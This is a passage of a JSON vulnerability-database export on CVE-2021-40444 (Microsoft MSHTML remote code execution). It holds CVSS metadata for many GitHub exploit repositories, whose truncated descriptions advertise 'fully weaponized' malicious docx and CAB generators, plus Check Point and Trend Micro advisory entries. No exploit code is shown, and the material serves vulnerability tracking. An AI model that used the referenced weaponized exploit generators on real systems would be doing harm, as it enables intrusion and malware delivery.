1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-14T20:32:28", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-18T19:46:25", "id": "7DE60C34-40B8-50E4-B1A0-FC1D10F97677", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-24T07:50:01", "description": "# CVE-2021-40444_CAB_archives\nCVE-2021-40444 - Custom CAB templa...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-24T10:59:34", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-12-15T00:43:34", "id": "B7D137AD-216F-5D27-9D7B-6F3B5EEB266D", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:34:32", "description": "# Fully Weaponized CVE-2021-40444\n\nMalicious docx generator to e...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-12-28T06:33:25", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-12-28T09:38:18", "id": "CCA69DF0-1EB2-5F30-BEC9-04ED43F42EA5", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-05T05:19:33", "description": "# CVE-2021-40444 PoC\n\nMalicious docx generator to exploit CVE-20...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-06-05T02:27:21", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2023-06-05T02:29:52", "id": "1934A15D-9857-5560-B6CA-EA6A2A8A91F8", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-01-09T21:51:56", "description": "# Microsoft MSHTML Remote Code Execution Vulnerability CVE-2021-...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-08T08:32:40", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-01-09T21:16:38", "id": "FBB2DA29-1A11-5D78-A28C-1BF3821613AC", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:10:41", "description": "# Docx-Exploit-2021\n\nThis docx exploit uses r...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-29T10:35:55", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-04-11T07:58:23", "id": "B9C2639D-9C07-5F11-B663-C144F457A9F7", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-31T08:47:22", "description": "# Fully Weaponized CVE-2021-40444\n\nMalicious docx generator to e...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-15T22:34:35", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-05-31T01:08:02", "id": "29AB2E6A-3E44-55A2-801D-2971FABB2E5D", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:03:37", "description": "# CVE-2021-40444-URL-Extractor\n\nPython script to extract embedde...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-16T16:54:50", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-20T19:01:48", "id": "0E965070-1EAE-59AA-86E6-41ADEFDAED7D", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:38:09", "description": "# CVE-2021-40444 PoC\n\nMalicious docx generator to exploit CVE-20...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-22T13:29:20", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-11-22T13:41:39", "id": "DD5D2BF7-BE9D-59EA-8DF2-D85AEC13A4A0", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-01-26T03:16:25", "description": "# CVE-2021-40444-POC\nAn attempt to reproduce Microsoft MSHTML Re...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-28T14:55:46", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-01-26T02:46:54", "id": "8B907536-B213-590D-81B9-32CF4A55322E", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-09-17T02:21:49", "description": "# Microsoft-Office-Word-MSHTML-Remote-Code-Exe...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-12-19T08:16:07", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2023-09-16T21:49:48", "id": "AAFEAA7E-81B7-5CE7-9E2F-16828CC5468F", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:38:48", "description": "# TIC4301_Project\nTIC4301 Project - CVE-2021-40444\n\nDownload the...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-10-16T07:07:26", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-12-06T13:36:02", "id": "111C9F44-593D-5E56-8040-615B48ED3E24", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:05:20", "description": "# CVE-2021-40444\nCVE-2021-40444 POC\n\n-----BEGIN PUBLIC KEY-----\n...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-09T02:30:26", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-17T10:41:29", "id": "37D2BE4F-9D7A-51CD-B802-2FAB35B39A4E", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-24T12:46:04", "description": "# CVE-2021-40444 docx Generate\n.docx generate...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-11T02:49:37", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-12-24T11:57:05", "id": "88EFCA30-5DED-59FB-A476-A92F53D1497E", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:05:39", "description": "\"Fork\" of [lockedbytes](https://github.com/lockedbyte) CVE-2021-...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-14T13:45:36", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-12-15T14:42:59", "id": "F5CEF191-B04C-5FC5-82D1-3B728EC648A9", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-17T22:52:51", "description": "# CVE-2021-40444--CABless version\nUpdate: Modified code so that ...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-19T19:46:28", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-07-17T22:25:33", "id": "0E388E09-F00E-58B6-BEFE-026913357CE0", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-09-17T02:36:47", "description": "CVE-2021-40444 builders\n\nThis repo contain builders of cab file,...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-12T18:05:53", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2023-09-16T21:47:26", "id": "8CD90173-6341-5FAD-942A-A9617561026A", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:34:05", "description": "# \u3016EXP\u3017Ladon CVE-2021-40444 Office\u6f0f\u6d1e\u590d\u73b0\n\n\n### \u6f0f\u6d1e\u6982\u8ff0\n\n\u5317\u4eac\u65f6\u95f49\u67088\u65e5\uff0c\u7eff\u76df\u79d1\u6280...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-14T17:10:48", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-40444"], "modified": "2021-11-15T04:16:33", "id": "FF761088-559C-5E71-A5CD-196D4E4571B8", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:37:55", "description": "A remote code execution vulnerability exists in Microsoft Internet Explorer MSHTML. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-09T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Internet Explorer MSHTML Remote Code Execution (CVE-2021-40444)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-14T00:00:00", "id": "CPAI-2021-0554", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "trendmicroblog": [{"lastseen": "2021-09-29T14:37:27", "description": "Trend Micro detected a new campaign using a recent version of the known FormBook infostealer. Newer FormBook variants used the recent Office 365 zero-day vulnerability, CVE-2021-40444.", "cvss3": {}, "published": "2021-09-29T00:00:00", "type": "trendmicroblog", "title": "FormBook Adds Latest Office 365 0-Day Vulnerability (CVE-2021-40444) to Its Arsenal", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-29T00:00:00", "id": "TRENDMICROBLOG:E17B66F8728189778826A0F497A540F2", "href": "https://www.trendmicro.com/en_us/research/21/i/formbook-adds-latest-office-365-0-day-vulnerability-cve-2021-404.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-25T08:36:17", "description": "Microsoft has disclosed the existence of a new zero-day 